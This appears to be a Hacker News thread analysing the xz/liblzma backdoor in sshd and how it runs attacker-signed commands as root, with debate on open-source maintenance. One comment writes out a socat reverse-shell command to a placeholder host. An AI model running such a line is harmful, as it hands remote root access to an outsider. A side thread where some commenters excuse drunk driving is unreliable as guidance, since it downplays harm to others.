This looks like state sponsored attack. Imagine having a backdoor that you can just go to any Linux server and with your key you can make it execute any code you wish without any audit trail. And no one without the key can do it, so even if your citizens use such vulnerable system other states won't be able to use your backdoor.
Spending two years actually maintaining an open source project that you will later backdoor is a very expensive way to perform such research.
Untargeted (backdoor goes almost everywhere), but very selective (backdoor can only be triggered by the original attacker).
So unless that key is leaked
But, just for replayability, we could "patch" the exploit with a known key and see what it does, don't we?
Replayability means something different in this context. First, we do know the backdoor will pass the payload to system, so in general it is like an attacker has access to bash, presumably as root since it is sshd.
Replayability means, if someone were to catch a payload in action which did use the exploit, you can’t resend the attacker’s data and have it work. It might contain something like a date or other data specific only to the context it came from. This makes a recorded attack less helpful for developing a test… since you can’t replay it.
It might contain something like a date or other data specific only to the context it came from.
In all these modern protocols, including SSHv2 / SecSH (Sean Connery fans at the IETF evidently) both parties deliberately introduce random elements into a signed conversation as a liveness check - precisely to prevent replaying previous communications.
TLS 1.3's zero round-trip (ORT) mode cannot do this, which is why it basically says you'd better be damn sure you've figured out exactly why it's safe to use this, including every weird replay scenario and why it's technically sound in your design or else you must not enable it. We may yet regret the whole thing and just tell everybody to refuse it.
What could be done, I think, is patch the exploit into logging the payload (and perhaps some network state?) instead of executing it to be able to analyse it. Analyse it, in the unlikely case that the owner of the key would still try their luck using it after discovery, on a patched system.
What it does: it's full RCE, remote code execution, it does whatever the attacker decides to upload. No mystery there.
see what it does
it does whatever the decrypted/signed payload tells the backdoor to execute - it's sent along with the key.
The backdoor is just that - a backdoor to let in that payload (which will have come from the attacker in the future when they're ready to use this backdoor).
It would be really cool if in 20 years when we have quantum computers powerful enough we could see what this exploit does.
My understanding is that we know somehow already what the exploit allows the attacker to do - we just can't reproduce it because we don't have their private key.
Technically, we can modify the backdoor and embed our own public key - but there is no way to probe a random server on the internet and check if it's vulnerable (from a scanner perspective).
In a certain way it's a good thing - only the creator of the backdoor can access your vulnerable system...
It's a NOBUS (Nobody But Us can use it) attack. The choice to use a private key means it's possible that even the person who submitted the tampered code doesn't have the private key, only some other entity controlling them does.
AFAIK still no luck with Gauss from 2012
We do know what it does. If it decrypts it just passes to system().
I don't understand yet where the "unreplayable" part comes from, but this isn't it.
Replayable: You observe attack against server A, you can take that attack and perform it against server B.
This attack is unreplayable because it cryptographically ties into the SSH host key of the server.
I know what replayable means. But even with your explanation of what makes it unreplayable it's not strictly true: you could replay the attack on the server it was originally played against.
Sure. But the interest is in being able to talk to server B to figure out if it's vulnerable; that's impossible, because the attack can't be replayed to it.
It's not using RSA. It's hooking RSA. And the attacker's signature is Ed448, not RSA.
That's the most interesting part. No, we don't know it yet. The backdoor is so sophisticated that none of us can fully understand it. It is not a “usual” security bug.
Yeah these types of security issues will be used by politicians to force hardware makers to lockdown hardware, embed software in chips.
The go fast startups habit of “import the world to make my company products” is a huge security issue IT workers ignore.
The only solution politics and big tech will chase is obsolete said job market by pulling more of the stack into locked down hardware, with updates only allowed to come from the gadget vendor.
The NSA demands that Intel and AMD provide backdoor ways to turn off the IME/PSP, which are basically a small OS running in a small processor inside your processor. So the precedent is that the government wants less embedded software in their hardware, at least for themselves.
If we relied on gadget vendors to maintain such software, I think we can just look at any IoT or router manufacturer to get an idea of just how often and for how long they will update the software. So that idea will probably backfire spectacularly if implemented.
What does the IME or PSP do?
Short answer: anything it wants.
IME has privileged access to the MMU(s), all system memory, and even out-of-band access to the network adapter such the the OS cannot inspect network traffic originating with or destined for the IME.
Lots. It's basically an extra processor that runs at all times, even when your computer is supposedly "off." Its firmware is bigger than you'd think, like a complete Unix system big. It's frankly terrifying how powerful and opaque it is. It provides a lot around remote management for corporations, lots of "update the BIOS remotely" sort of features, and also a bunch of those stupid copy protection enforcement things. Plus some startup/shutdown stuff like Secure Boot.
I'm not saying political forces won't try legislating the problem away, but that won't even help here.
A supply chain attack can happen in hardware or software. Hardware has firmware, which is software.
What makes this XZ attack so scary is that it was directly from a "trusted" source. A similar attack could come from any trusted source.
At least with software it is much easier to patch.
Like you said it has firmware which is flashable. Secure enclaves are never 100% secure but if only, for example, Apple can upload to them, it dramatically reduces some random open source project being git pulled. Apple may still pull open source but they would be on the hook to avoid this.
Open sources days of declaring “use at your risk” have become a liability in this hyper networked society. It’s now becoming part of the problem it was imagined up to solve.
Why would "embed software in chips" be a solution?
If anything, I'd expect it to be an even bigger risk, because when (not if) a security issue is found in the hardware, you now have no way to fix it, other than throwing out this server/fridge/toothbrush or whatever is running it.
A flashable secure enclave segment in the hardware stack is an option to patch around embedded bugs.
I haven’t worked in hardware design since the era of Nortel, and it was way different back then but the general physics are the same; if, else, while, and math operations in the hardware are not hard.
In fact your hardware is a general while loop; while has power, iterate around refreshing these memory states with these computed values, even in the absence of user input (which at the root is turning it on).
Programmers have grown accustomed to being necessary to running ignorant business machines but that’s never been a real requirement. Just a socialized one. And such memes are dying off.
Which will make updates either expensive or impossible. You will be able to write books about exploitable bugs in the hardware, and those books will easily survive several editions.
It’s not that we can’t understand it, it’s just that work to understand it is ongoing.
What makes you say that? I haven't started reverse engineerinng it myself, but from all I have read, people who did have a very good understanding of what it does. They just can't use it themselves, because they would need to have the attacker's private key.
From what I’ve read I think the attack vector is:
1. sshd starts and loads the libsystemd library which loads the XZ library which contains the hack
2. The XZ library injects its own versions of functions in openssl that verify RSA signatures
3. When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
4. The certificate, in turn, can contain arbitrary data that in a normal login process would include assertions about username or role that would be used to determine if the certificate is valid for use logging in as the particular user. But if the hacked functions detect that the certificate was signed by a specific attacker key, they take some subfield of the certificate and execute it as a command on the system in the sshd context (ie, as the root user).
Unfortunately, we don’t know the attacker’s signing key, just the public key the hacked code uses to validate it. But basically this would give the attacker a way to run any command as root on any compromised system without leaving much of a trace, beyond the (presumably failed) login attempt, which any system on the internet will be getting a lot of anyway.
beyond the (presumably failed) login attempt
There is some evidence it's scrubbing logs so we might not even have that.
Is there really a failed login attempts? If it never calls the real functions of ssh in case of their own cert+payload why would sshd log anything or even register a login attempt? Or does the backdoor function hook in after sshd already logged stuff?
I think it would depend on logging level, yeah. I’ve not seen one way or another whether it aborts the login process or prevents logging, but that’s possible, and would obviously be a good idea. Then the question would be if you could detect the difference between a vulnerability-aborted login attempt and just a malformed/interrupted login attempt.
But in the case of this specific attack, probably the safest approach would be to watch and track what processes are being spawned by sshd. Which in retrospect is probably advisable for any network daemon. (Of course, lots of them will be sloppy and messy with how they interact with the system and it might be next to impossible to tell attacks from “legit” behavior. But sshd is probably easier to pin down to what’s “safe” or not.
Depending on log level, isn't there going to be lines up to receiving the payload?
When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
So if I only use pubkey auth and ED25519, there's no risk?
Besides this, just to understand it better, if someone tries to login to your server with the attacker's certificate, the backdoor will disable any checks for it and allow the remote user to login as root (or any other arbitrary user) even if root login is disabled in sshd config?
I don’t think we know enough to be sure even disabling certificate auth would prevent this. But from what I can tell it probably wouldn’t directly allow arbitrary user login. It only seems to allow the execution of an arbitrary command. But of course that command might do something that would break any other security on the system.
But, one clever thing about this attack is that the commands being run wouldn’t be caught by typical user-login tracking, since there’s no “login”. The attacker is just tricking sshd into running a command.
So is the implication here that any system that allows SSH and contains this malicious code is vulnerable?
Siblings saying "we don't know" haven't really groked the post I don't think.
If I'm understanding the thread correctly, here's a (not so) succinct explanation. Please, if you know better than I do, correct me if I've made an error in my understanding.
`system()` is a standard C function that takes a string as input and runs it through `sh`, like so:
sh -c "whatever input"
It's used as a super rudimentary way to run arbitrary shell commands from a C program, using the `execl()` call under the hood, just like you'd run them on a bash/sh/fish/zsh/whatever command line. system("echo '!dlroW ,olleH' | rev");
Those commands run mostly in the same privilege context as the process that invoked `system()`. If the call to `system()` came from a program running as root, the executed command is also run as root.The backdoor utilizes this function in the code that gets injected into `sshd` by way of liblzma.so, a library for the LZMA compression algorithm (commonly associated with the `.xz` extension). Jia Tan, the person at the center of this whole back door, has been a maintainer of that project for several years now.
Without going too much into how the injected code gets into the `sshd` process, the back door inserts itself into the symbol lookup process earlier than other libraries, such as libcrypto and openssl. What this means is (and I'm over-simplifying a lot), when the process needs to map usages of e.g. `SSL_decrypt_key()` that were linked to dynamic libraries (as opposed to be statically linked and thus included directly into `sshd`), to real functions, it does a string-wise lookup to see where it can find it.
It runs through a list of dynamic libraries that might have it and sees if they export it. If they do, it gets the address of the exported function and remembers where it's at so that further calls to that function can be found quickly, without another search. This is how DLLs and SOs (dynamic libraries) are linked to the process that needs them at runtime without the process needing to know exactly where the functions that they need are located.
The back door hijacks this mechanism to insert its own functions in some of those places, so that when `sshd` thinks it's calling `SSL_decrypt_key()`, it's really calling some malicious function in the back door - which can then choose to do something with the data passed to the function call, or it can choose to forward the call to the real function.
It makes use of this when `sshd` needs to validate RSA information passed to the server via a client connection during authentication. An RSA key has a bunch of fields, one of which is the 'n' field - the public key data itself. OpenSSL implements this as a BIGNUM, or a variable-length, potentially very large number. It's more or less read in as a bag of bytes, and its meaning depends on the underlying encryption algorithm. This is the mechanism behind "public key authentication" when connecting to servers, and is generally more secure than e.g. username/password authentication.
The back door intercepts the call to check the RSA data, pulls out the 'n' parameter, and tries to decrypt it using ChaCha20. There's no way for it to know if it's decrypted beforehand, but generally encryption algorithms have a way to error-check and report failures - that, or you add some well known piece of information into the encrypted data that you can verify once it's decrypted.
Either way, the back door checks to see if it's really an encrypted string. If not, it forwards the call back to the original RSA check mechanism so that sshd can process it normally.
However, if the decryption succeeds, the back door passes the decrypted string to `system()`. This means that a random client connecting to an SSH server can craft an RSA public key that is really an encrypted, malicious payload to run any arbitrary shell command under which the same user `sshd` is running - oftentimes root.
Not only that, but the back door also checks the incoming RSA structure to see if it's coming from the person who made it. This prevents any of us finding this exploit and using it ourselves, even if we know our target is infected. It's a completely exclusive back door to whomever holds the private key used by the back door to sort of 'authenticate' the exploit itself.
This is much worse than what many of us thought it was before - a public key auth bypass - which would have meant that you'd only gain access to any user allowed to log in via SSH. SSH's configuration file has a setting that disables root logins under any circumstances that is generally enabled on production systems for obvious reasons. However, with it being an RCE, SSH servers running as root would execute the payloads as root.
From there, they could easily run socat and have the system connect to a server of their choice to gain a remote interactive shell, for example:
socat TCP:example.com:1234 SYSTEM:"bash -l"
The possibilities are really endless. They'd effectively have a skeleton key that only they could use (or sell) that, with enough time for people to upgrade their version of `sshd`, would allow them access to just about any SSH server they could connect to, oftentimes with root permissions.Hope that explains it a bit.
Thank you for the detailed write up. This made me think, why do we actually let sshd run as root? Would it be possible to only run a very unsophisticated ssh server as root that depending on the user specified in the incoming connection just coordinates that connection to the actual user and let the server run there? This could be so simplistic that a backdoor would more easily be detected.
Because it needs to be able to spawn processes as any user.
They'd effectively have a skeleton key that only they could use (or sell) that
this looks more like state sponsored attack and it doesn't look like someone joining and at one point realizing they want to implement this backdoor.
The guy joined the project 2 years ago, developed a test framework (which he then used to hide binary of the backdoor in which appears that is complex and others are still figuring out how it works) then he gradually disabled various security checks before activating it.
Siblings saying "we don't know" haven't really groked the post I don't think.
The reason for saying "we don't know" is not that we don't understand what's detailed in TFA, but that the backdoor embeds a 88 kB object file into liblzma, and nobody has fully reverse engineered and understood all that code yet. There might be other things lurking in there.
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Not if public-key cryptography was used correctly, and if there are no exploitable bugs.
We understand it completely. However, since determining the private key that corresponds to the public key embedded in the backdoor is practically infeasible, we can't actually exercise it. Someone could modify the code with a known ed448 private key and exercise it, but the point of having the PoC is to scan the internet and find vulnerable servers.
Attacker wants to be able to send an especially crafted public key to their target's server's sshd. That crafted key is totally bogus input, a normal sshd would just probably reject it as invalid. The bits embedded into the key are actually malicious code, encrypted/signed with the attacker's secret key.
In order to achieve their objective, they engineered a backdoor into sshd that hooks into the authentication functions which handle those keys. Whenever someone sends a key, it tries to decrypt it with the attacker's keys. If it fails, proceed as usual, it's not a payload. If it successfully decrypts, it's time for the sleeper agent to wake up and pipe that payload into a brand new process running as root.
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available?
The exploit as shipped is a binary (cleverly hidden in the test data), not source. And it validates the payload vs. a private key that isn't known to the public. Only the attacker can exercise the exploit currently, making it impossible to scan for (well, absent second order effects like performance, which is how it was discovered).
As a de facto maintainer of an obscure open source game, I see devs come and go. I just merge all the worthwhile contributions. Some collaborators go pretty deep with their features, with a variety of coding styles, in a mishmash of C and C++. I'm not always across the implementation details, but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed. Lucky the game is so obscure and the attack surface minuscule, but it did stop me from any temptation to sign Windows binaries out of any sense of munificence.
This xz backdoor is just the most massive nightmare, and I really feel for the og devs, and anyone who got sucked in by this.
but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed
That's true of course, but it's not a problem specific to software. In fact, I'm not even sure it's a "problem" in a meaningful sense at all.
When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it. Police aren't around to help you. This horror scenario, much worse than a software backdoor, is actually the minimum viable danger that you need to accept in order to be able to do anything at all. And yes, sometimes it does really happen.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has. The fantasy that if code review was just a little tighter, if more linters, CI mechanisms, and pattern matching were employed, if code signing was more widespread, if we verified people's identities etc., if all these things were implemented, then such scenarios could be prevented, that fantasy is the real problem. It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
https://en.wikipedia.org/wiki/Normalcy_bias ?
It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
What "cure" would you recommend?
You need to accept that everything has a tradeoff and some amount of drama just seems to be built into the system.
Take sex work, for example. Legalizing it leads to an overall increase in sex trafficking. But it also does this: https://www.washingtonpost.com/news/wonk/wp/2014/07/17/when-...
My personal opinion is that if something is going to find a way to conduct itself in secret anyway (at high risk and cost) if it is banned, it is always better to just suck it up and permit it and regulate it in the open instead. Trafficked people are far easier to discover in an open market than a black one. Effects of anything (both positive and negative) are far easier to assess when the thing being assessed is legal.
Should we ban cash because it incentivizes mugging and pickpocketing and theft? (I've been the victim of pickpocketing. The most valuable thing they took was an irreplaceable military ID I carried (I was long since inactive)... Not the $25 in cash in my wallet at the time.) I mean, there would literally be far fewer muggings if no one carried cash. Is it thus the cash's "fault"?
But there have to be specific trade-offs, in each case.
I am reminded of the words of "a wise man."
https://news.ycombinator.com/item?id=39874049
Captain's Log: This entire branch of comments responding to OP is not helping advance humanity in any significant way. I would appreciate my statement of protest being noted by the alien archeologists who find these bits in the wreckage of my species.
I think drunk driving being an oil that keeps society lubricated cannot and should not be understated.
Yes, drunk driving kills people and that's unacceptable. On the other hand, people going out to eat and drink with family, friends, and co-workers after work helps keep society functioning, and the police respect this reality because they don't arrest clearly-drunk patrons coming out of restaurants to drive back home.
This is such a deeply American take that I can't help but laugh out loud. It's like going to a developing nation and saying that, while emissions from two stroke scooters kills people there's no alternative to get your life things done.
It certainly isn't just America, though we're probably certainly the most infamous example.
I was in France for business once in the countryside (southern France), and the host took everyone (me, their employees, etc.) out to lunch. Far as I could tell it was just an everyday thing. Anyway, we drove about an hour to a nearby village and practically partied for a few hours. Wine flowed like a river. Then we drove back and we all got back to our work. So not only were we drunk driving, we were drunk working. Even Americans usually don't drink that hard; the French earned my respect that day, they know how to have a good time.
Also many times in Japan, I would invite a business client/supplier or a friend over for dinner at a sushi bar. It's not unusual for some to drive rather than take the train, and then of course go back home driving after having had lots of beer and sake.
Whether any of us like it or not, drunk driving is an oil that lubricates society.
Even Americans usually don't drink that hard; the French earned my respect that day.
Is drinking hard something so deserving of respect? Is working while impaired?
To me this reads as "I like to fuck off and be irresponsible and man did these French guys show me how it's done!"
Except they weren't irresponsible. We all drove back just fine, and we all went back to work just as competently as before like nothing happened.
It takes skill and maturity to have a good time but not so much that it would impair subsequent duties. The French demonstrated to me they have that down to a much finer degree than most of us have in America, so they have my respect.
This isn't to say Americans are immature, mind you. For every drunk driving incident you hear on the news, hundreds of thousands if not millions of Americans drive home drunk without harming anyone for their entire lives. What I will admit is Americans would still refrain from drinking so much during lunch when we still have a work day left ahead of us, that's something we can take lessons from the French on.
Life is short, so those who can have more happy hours without compromising their duties are the real winners.
As someone who knows people who died in a crash with another drunk driver, it is hard for me to accept your view. Certainly, at a bare minimum, the penalties for drunk driving that results in fatality should be much harsher than they are now -- at that point there is hard empirical evidence that you cannot be trusted to have the "skill and maturity" necessary for driving -- but we can't even bring ourselves to do that, not even for repeat offenders.
Eventually I am optimistic that autonomous driving will solve the problem entirely, at least for those who are responsible drivers. In an era of widely available self-driving cars, if you choose to drive drunk, then that is an active choice, and no amount of "social lubrication" can excuse such degenerate behavior.
I'm certainly not trying to understate the very real and very serious suffering that irresponsible drunk drivers can and do cause. If any of this came off like that then that was never my intention.
When it comes to understanding drunk driving and especially why it is de facto tolerated by society despite its significant problems, it's necessary to consider the motivators and both positive and negative results. Simply saying "they are all irresponsible and should stop" and such with a handwave isn't productive. After all, society wouldn't tolerate a significant problem if there wasn't a significant benefit to doing so.
You can laugh out loud all you want, but there are mandatory parking minimums for bars across the USA.
Yes, bars have parking lots, and a lot of spaces.
The intent is to *drive* there, drink and maybe eat, and leave in some various state of drunkenness. Why else would the spacious parking lots be required?
drunk driving may kill a lot of people, but it also helps a lot of people get to work on time, so, it;s impossible to say if its bad or not,
What is more depressing is how we can acknowledge that reality and continue to do absolutely nothing to mitigate it but punish it, in many cases.
The more people practically need to drive, the more people will drunk drive and kill people, yet in so many cases we just sort of stop there and be like "welp, guess that's just nature" instead of building viable alternatives. However the other theoretical possibly is that if people didn't need to drive, they might end up drinking more.
https://en.wikipedia.org/wiki/Normalcy_bias
Indeed, that "bias" is a vital mechanism that enables societies to function. Good luck getting people to live together if they look at passerbys thinking "there is a 0.34% chance that guy is a serial killer".
What "cure" would you recommend?
Accepting that not every problem can, or needs to be, solved. Today's science/tech culture suffers from an almost cartoonish god complex seeking to manage humanity into a glorious data-driven future. That isn't going to happen, and we're better off for it. People will still die in the future, and they will still commit crimes. Tomorrow, I might be the victim, as I already have been in the past. But that doesn't mean I want the insane hyper-control that some of our so-called luminaries are pushing us towards to become reality.
Honestly this is why I think we should pay people for open source projects. It is a tragedy of the commons issues. All of us benefit a lot from these free software, and done for free. Pay doesn't exactly fix the problems directly, but they do decrease the risk. Pay means people can work on these full time instead of on the side. Pay means it is harder to bribe someone. Pay also makes the people contributing feel better and more like their work is meaningful. Importantly, pay signals to these people that we care about them. I think the big tech should pay. We know the truth is that they'll pass on the costs to us anyways. I'd also be happy to pay taxes but that's probably harder. I'm not sure what the best solution is and this is clearly only a part of a much larger problem, but I think it is very important that we actually talk about how much value OSS has. If we're going to talk about how money represents value of work, we can't just ignore how much value is generated from OSS and only talk about what's popular and well know. There are tons of critical infrastructure in every system you could think of (traditional engineering, politics, anything) that is unknown. We shouldn't just pay things that are popular. We should definitely pay things that are important. Maybe the conversation can be different when AI takes all the jobs (lol)
Ya so we could have paid this dude to put the exploits in our programs good IDEA y
If you're going to criticize me, at least read what I wrote first
Using what bank? He used a fake name and a VPN.
I get why, in principle, we should pay people for open source projects, but I guess it doesn't make much of a difference when it comes to vulnerabilities.
First off, there are a lot of ways to bring someone to "the dark side". Maybe it's blackmail. Maybe it's ideology ("the greater good"). Maybe it's just pumping their ego. Or maybe it's money, but not that much, and extra money can be helpful. There is a long history of people spying against their country or hacking for a variety of reasons, even if they had a job and a steady paycheck. You can't just pay people and expect them to be 100% honest for the rest of their life.
Second, most (known) vulnerabilities are not backdoors. As any software developer knows, it's easy to make mistakes. This also goes for vulnerabilities. Even as a paid software developer, uou can definitely mess up a function (or method) and accidentally introduce an off-by-one vulnerability, or forget to properly validate inputs, or reuse a supposedly one-time cryptographic quantity.
I think it does make a difference when it comes to vulnerabilities and especially infiltrators. You're doing these things as a hobby. Outside of your real work. If it becomes too big for you it's hard to find help (exact case here). How do you pass on the torch when you want to retire?
I think money can help alleviate pressure from both your points. No one says that money makes them honest. But if it's a full time job you are less likely to just quickly look and say lgtm. You make fewer mistakes when you're less stress or tired. It's harder to be corrupted because people would rather a stable job and career than a one time payout. Pay also makes it easier to trace.
Again, it's not a 100% solution. Nothing will be! But it's hard to argue that this wouldn't alleviate significant pressure.
https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.h...
When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it.
Sure you can. You can be more vigilant and careful when walking near traffic. So maybe don't have headphones on, and engage all your senses on the immediate threats around you. This won't guarantee that a car won't run you over, but it reduces the chances considerably to where you can possibly avoid it.
The same can be said about the xz situation. All the linters, CI checks and code reviews couldn't guarantee that this wouldn't happen, but they sure would lower the chances that it does. Having a defeatist attitude that nothing could be done to prevent it, and that therefore all these development practices are useless, is not helpful for when this happens again.
The major problem with the xz case was the fact it had 2 maintainers, one who was mostly absent, and the other who gradually gained control over the project and introduced the malicious code. No automated checks could've helped in this case, when there were no code reviews, and no oversight over what gets merged at all. But had there been some oversight and thorough review from at least one other developer, then the chances of this happening would be lower.
It's important to talk about probabilities here instead of absolute prevention, since it's possible that even in the strictest of environments, with many active contributors, malicious code could still theoretically be merged in. But without any of it, this approaches 100% (minus the probability of someone acting maliciously to begin with, having their account taken over, etc.).
It's not defeatist to admit and accept that some things are ultimately out of our control. And more importantly, that any attempt to increase control over them comes with downsides.
An open source project that imposes all kinds of restrictions and complex bureaucratic checks before anything can get merged, is a project I wouldn't want to participate in. I imagine many others might feel the same. So perhaps the loss from such measures would be greater than the gain. Without people willing to contribute their time, open source cannot function.
It's not defeatist to admit and accept that some things are ultimately out of our control.
But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
And more importantly, that any attempt to increase control over them comes with downsides.
That's a subjective opinion. I personally find linters and code reviews essential to software development, and if you think of them as being restrictions or useless bureaucratic processes that prevent you from contributing to a project then you're entitled to your opinion, but I disagree. The downsides you mention are simply minimum contribution requirements, and not having any at all would ultimately become a burden on everybody, lead to a chaotic SDLC, and to more issues being shipped to users. I don't have any empirical evidence to back this up, so this is also "just" my opinion based on working on projects with well-defined guidelines.
I'm sure you would agree with the Optimistic Merging methodology[1]. I'd be curious to know whether this has any tangible benefits as claimed by its proponents. At first glance, a project like https://github.com/zeromq/libzmq doesn't appear to have a more vibrant community than a project of comparable size and popularity like https://github.com/NixOS/nix, while the latter uses the criticized "Pessimistic Merging" methodology. Perhaps I'm looking at the wrong signals, but I'm not able to see a clear advantage of OM, while I can see clear disadvantages of it.
libzmq does have contribution guidelines[2], but a code review process is unspecified (even though it mentions having "systematic reviews"), and there are no testing requirements besides patches being required to "pass project self-tests". Who conducts reviews and when, or who works on tests is entirely unclear, though the project seems to have 75% coverage, so someone must be doing this. I'm not sure whether all of this makes contributors happier, but I sure wouldn't like to work on a project where this is unclear.
Without people willing to contribute their time, open source cannot function.
Agreed, but I would argue that no project, open source or otherwise, can function without contribution guidelines that maintain certain quality standards.
But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
In this particular case, having a static project or a single maintainer rarely releasing updates would actually be an improvement! The people/sockpuppets calling for more/faster changes to xz and more maintainers to handle that is exactly how we ended up with a malicious maintainer in charge in the first place. And assuming no CVEs or external breaking changes occur, why does that particular library need to change?
Difference is that software backdoors can effect billions of people. That driver on the road can't effect too many without being caught.
In this case, had they been a bit more careful with performance, they could have effected millions of machines without being caught. There aren't many cases where a lone wolf can do so much damage outside of software.
A few more issues like this in crucial software and we might actually see the big companies stepping up to fund that kind of care and attention.
This is a good take. But even in a forest, sometimes when tragedy strikes people do postmortems, question regulations and push for change.
Sometimes, it does seem like the internet incentivizes or makes everyone else accessible to a higher ratio of people who seem to harm than normal.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
Wholeheartedly agree. Fundamentally, we all assume that people are operating with good will and establish trust with that as the foundation (granted to varying degrees depending on the culture, some are more trusting or skeptical than others).
It's also why building trust takes ages and destroying it only takes seconds, and why violations of trust at all are almost always scathing to our very soul.
We certainly can account for bad actors, and depending on what's at stake (eg: hijacking airliners) we do forego assuming good will. But taking that too far is a very uncomfortable world to live in, because it's counter to something very fundamental for humans and life.
The late author of ZeroMQ, Pieter Hintjens, advocated for a practice called Optimistic Merging[1], where contributions would be merged immediately, without reviewing the code or waiting for CI results. So your approach of having lax merging guidelines is not far off.
While I can see the merits this has in building a community of contributors who are happy to work on a project, I always felt that it opens the project to grow without a clear vision or direction, and ultimately places too much burden on maintainers to fix contributions of others in order to bring them up to some common standard (which I surely expect any project to have, otherwise the mishmash of styles and testing practices would make working on the project decidedly not fun). It also delays the actual code review, which Pieter claimed does happen, to some unknown point in the future, when it may or may not be exhaustive, and when it's not clear who is actually responsible of conducting it or fixing any issues. It all sounds like a recipe for chaos where there is no control over what eventually gets shipped to users. But then again, I never worked on ZeroMQ or another project that adopted these practices, so perhaps you or someone else here can comment on what the experience is like.
And then there's this issue of malicious code being shipped. This is actually brought up by a comment on that blog post[2], and Pieter describes exactly what happened in the xz case:
Let's assume Mallory is patient and deceitful and acts like a valid contributor long enough to get control over a project, and then slowly builds in his/her backdoors. Then careful code review won't help you. Mallory simply has to gain enough trust to become a maintainer, which is a matter of how, not if.
And concludes that "the best defense [...] is size and diversity of the community".
Where I think he's wrong is that a careful code review _can_ indeed reduce the chances of this happening. If all contributions are reviewed thoroughly, regardless if they're authored by a trusted or external contributor, then strange behavior and commits that claim to do one thing but actually do something else, are more likely to be spotted earlier than later. While OM might lead to a greater community size and diversity, which I think is debatable considering how many projects exist with a thriving community of contributors while also having strict contribution guidelines, it doesn't address how or when a malicious patch would be caught. If nobody is in charge of reviewing code, there are no testing standards, and maintainers have additional work keeping some type of control over the project's direction, how does this actually protect against this situation?
The problem with xz wasn't a small community; it was *no* community. A single malicious actor got control of the project, and there was little oversight from anyone else. The project's contribution guidelines weren't a factor in its community size, and this would've happened whether it used OM or not.
[1]: http://hintjens.com/blog:106
[2]: http://hintjens.com/blog:106/comments/show#post-2409627
The problem with xz wasn't a small community; it was no community. A single malicious actor got control of the project, and there was little oversight from anyone else.
So because of this a lot of other highly used software was importing and depending on unreviewed code. It's scary to think how common this is. The attack surface seems unmanageable. There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
This is why it's a good practice to minimize the amount of dependencies, and add dependencies only when absolutely required. Taking this a step further, doing a cursory review of each dependency, seeing the transitive dependencies it introduces, are also beneficial. Of course, it's impractical to do this for the entire dependency tree, and at some point we have to trust that the projects we depend on follow this same methodology, but having a lax attitude about dependency management is part of the problem that caused the xz situation.
One thing that I think would improve this are "maintenance scores". A service that would scan projects on GitHub and elsewhere, and assign a score to each project that indicates how well maintained it is. It would take into account the number of contributors in the past N months, development activity, community size and interaction, etc. Projects could showcase this in a badge in their READMEs, and it could be integrated in package managers and IDEs that could warn users if adding a dependency that has a low maintenance score. Hopefully this would disuade people to use poorly maintained projects, and encourage them to use better maintained ones, or avoid the dependency altogether. It would also encourage maintainers to improve their score, and there would be higher visibility of projects that are struggling, but have a high user base, as potentially more vulnerable to this type of attack. And then we can work towards figuring out how to provide the help and resources they need to improve.
Does such a service/concept exist already? I think GitHub should introduce something like this, since they have all the data to power it.
That’s not an effective idea for the same reason that lines of code is not a good measure of productivity. It’s an easy measure to automate but it’s purely performative as it doesn’t score the qualitative value of any of the maintenance work. At best it encourages you to use only popular projects which is its own danger (software monoculture is cheaper to attack) without actually resolving the danger - this attack is reasonably sophisticated and underhanded that could be slipped through almost any code review.
One real issue is that xz’s build system is so complicated that it’s possible to slip things in which is an indication that the traditional autoconf Linux build mechanism needs to be retired and banned from distros.
But even that’s not enough because an attack only needs to succeed once. The advice to minimize your dependencies is an impractical one in a lot of cases (clearly) and not in your full control as you may acquire a surprising dependency due to transitiveness. And updating your dependencies is a best practice which in this case actually introduces the problem.
We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned. For example, it would be pretty effective counter incentive for talent if we could permanently ban this person from ever working on lots of projects. That’s typically how humans deal with members of a community who misbehave and we don’t have a good digital equivalent for software development. Of course that’s also dangerous as blackball environments tend to become weaponized.
We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned.
So, either no open source development because nobody will vouch to that degree for others, or absolutely no anonymity and you'll have to worry about anything you provide because of you screw up and introduce a RCE all of a sudden you'll have a bunch of people and companies looking to say it was on purpose so they don't have to own up to any of their own poor practices that allowed it to actually be executed on?
